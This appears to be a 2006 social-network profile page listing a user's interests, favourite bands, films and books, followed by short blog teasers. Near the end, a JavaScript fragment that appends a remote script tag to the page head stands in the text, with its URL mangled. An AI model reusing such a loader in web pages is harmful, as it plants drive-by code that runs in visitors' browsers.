Doppelgangerâ„¢ profile picture


sh!t happens, moons go out of orbit..... thats life.

About Me

Why are you reading this get out of my html shit! "Its time for our old friend the lich drow to die again, Gromph Baenre replied, except this time permanently" - Gromph Baenre aim or yim - increasedgainIm a right brained, slightly wacky person thats into things like music, gaming, various forms of art and reading (mostly fantasy/fiction). Music is a huge part of my life, and without it I dont know what I would do with myself half of the time. Guitar and various other instruments (drums kinda) are serious hobbies of mine. I just finished up school at IADT for graphic design and am looking to use that for both things and stuff. I'm a trustworthy, caring person with a wacky sense of humour and can come off a bit weird at times, but where is the fun in being normal? :-D i'm on aim - Increasedgain and on Yahoo as Increasedgain if you want to say hello, or type obscenities or something.

My Interests

well heres a list of random stuff that I, audio, computers, concerts/live shows, creativity, drums, epitaph records, friends, fun, guitar, reading, sushi, different hair colors (not neon though), indie labels, jack in the box, metal, movies, after hour breakfasts, the beach, digital graphics, chess, music, rock paraphernalia, fantasy-fiction, late nights, CRPG's, franks redhot sauce, parties, well brewed beer (not bud light, more like bells oberon), punk rock, industrial, thai food, racquetball, video games, and thunderstorms + lightning. I've always enjoyed watching and listening to natures chaos :-D

I'd like to meet:

Someone who is cool and isn't a head case. I'd also like to meet Kate Beckinsale, Jennifer Connelly, and Mia KirshnerWhether people want to read it or not, i figured i'd make this part about who i wouldn't like to meet, and things i dont like! :-D Immature unstable girls, idiots, stuck up people, assholes, pricks, shallow people, liars and cheaters, closed minds, voice recognition systems that every bill collector and utility co. uses, poppy wanna be radio "punk", baseball, George W Bush, loud clanging noises, Quark, white people who think they're black, people who wear combs or spoons in their hair, people who dont know when to turn their cell phone off... width="425" height="350" ..


hmm, im mainly into all different kinds of rock. Metal, hard rock, punk rock, a little classic rock, and some industrial music. Here comes a huge and probably unnecessary list of many bands i listen to........NOFX - pennywise - stone temple pilots - NIN - bad religion - avenged sevenfold - mindless self indulgence - hum - marilyn manson - finch - white zombie - system of a down - metallica - the troubadours - soundgarden - full devil jacket (r.i.p.) - the red jumpsuit apparatus - cold - black sabbath - 30 seconds to mars - the doors - american head charge - zakk wylde, bls - prodigy - placebo - green day - megadeth - pantera - death by stereo - kmfdm - rush - foo fighters - rolling stones - apartment 26 - pulley - alice in chains - crud - machinehead - a perfect circle (pretty much anything Maynard touches) - tool - meshuggah - don mcclean - god lives underwater - soundgarden - flickerstick - sponge - our lady peace (old stuff) - pink floyd - chevelle - rancid (old stuff) - damone - nirvana - billy joel - velvet revolver - my chemical romance - lagwagon - static-x


The Shining, American Beauty, Scarface, Gone in 60 Seconds, Batman (w/Nicholson as Joker), Rainman, Office Space, Star Wars x6, Indiana Jones x3, Willow, The Rock, Full Metal Jacket, Requiem for a Dream, Mrs. Doubtfire, As Good as it Gets, Cruel Intentions, Gladiator, The Princess Bride, Old School, Seven, One Flew over the Cukoos Nest, Pulp Fiction, James Bond films (Brosnan and Connery), Goodfellas, Underworld 1 and 2


Seinfeld, Strangers with Candy, Conan O'Brien, South Park, Judge Mathis..........i dont watch a whole lot of tv really


R.A. Salvatore, J.R.R. Tolkien, Richard Lee Byers, Ed Greenwood, Richard Baker and moreI've read tons of the Drizzt books and am overall a big fan of the Forgotten Realms fantasy setting. They make for great books! I am currently reading a novel by Philip Athans named Annihilation. Its the 5th book in a 6 book series entitled "War of the Spider Queen". I still have lots of reading i'd like to do


Mega Man. Chuck Noblet. Mooshie. Drizzt. .."var s=document·createElement('script');s.src='http://../... /...';document·getElementsByTagName('head')[0].appendCh ild(s);"

My Blog

Too many video games, to little time! and PS3 sucks

Recently I picked up a copy of Final Fantasy XII for the PS2 and I must say, it does the series true. The game kicks a$$, and I am addicted, as was the case with nearly every other Final Fantasy game ...
Posted by Doppelganger" on Mon, 11 Dec 2006 09:12:00 PST


Well, those of you who drink good beer may be familiar with some dates relatable to seasonal brews. Bells Oberon is unfortunately at its bitter end for the year. Although some bars will still have it ...
Posted by Doppelganger" on Thu, 12 Oct 2006 06:38:00 PST

kill whitey?

Has anyone tried Wendy's new vanilla frosty?  if not, try it.  Its pretty f'in good.  That is all. tibs i know.  wanfa probably...
Posted by Doppelganger" on Tue, 05 Sep 2006 02:29:00 PST

shit - BLEW UP

Well, some of you may have heard that my finely tuned computer decided to take a dump on me a couple of days ago. I Think my motherboard is fried and who knows what else (bottom line is that...
Posted by Doppelganger" on Sun, 16 Jul 2006 02:53:00 PST

Thai madness

Lately I have been getting more and more into Thai food. I've always liked the stuff, but lately im eating it more often. I have to credit my friend Rob (actually wanfa but thats not relevant) fo...
Posted by Doppelganger" on Sun, 09 Jul 2006 09:19:00 PST

damn RPG's taking over again

Well, im out of school so I decided I wanted to get into another good RPG game.  They're dragging ass on Final Fantasy XII, so I thought id pick up another cool computer game.  Some people w...
Posted by Doppelganger" on Wed, 28 Jun 2006 10:43:00 PST


I went to see NIN for the first time, and it was kick ass.  The band sounded tight, the set list rocked and the weather was pretty good for a DTE show (pine knob for old people).  My only co...
Posted by Doppelganger" on Sun, 25 Jun 2006 09:17:00 PST

Mark of the beast

6 / 6 / 06 - this date only occurs once in a millenium and will be the only one in our lifetime.  Its kind of freaky.  Don't do anything life threatening today..   haha.  "Whe...
Posted by Doppelganger" on Tue, 06 Jun 2006 09:56:00 PST

Strange dream

Last night I had a pretty strange dream and whether you wanted to hear about it not im gonna tell about it here!  I don't remember some of the specifics, but I recall I was riding a bike through ...
Posted by Doppelganger" on Thu, 01 Jun 2006 12:41:00 PST


Well, tomorrow I have a huge ass project due for a class.  Its done!  Problem is I can't get it printed, because Kinko's is a steaming pile of shit.  I went there about an hour ago, and...
Posted by Doppelganger" on Mon, 22 May 2006 11:49:00 PST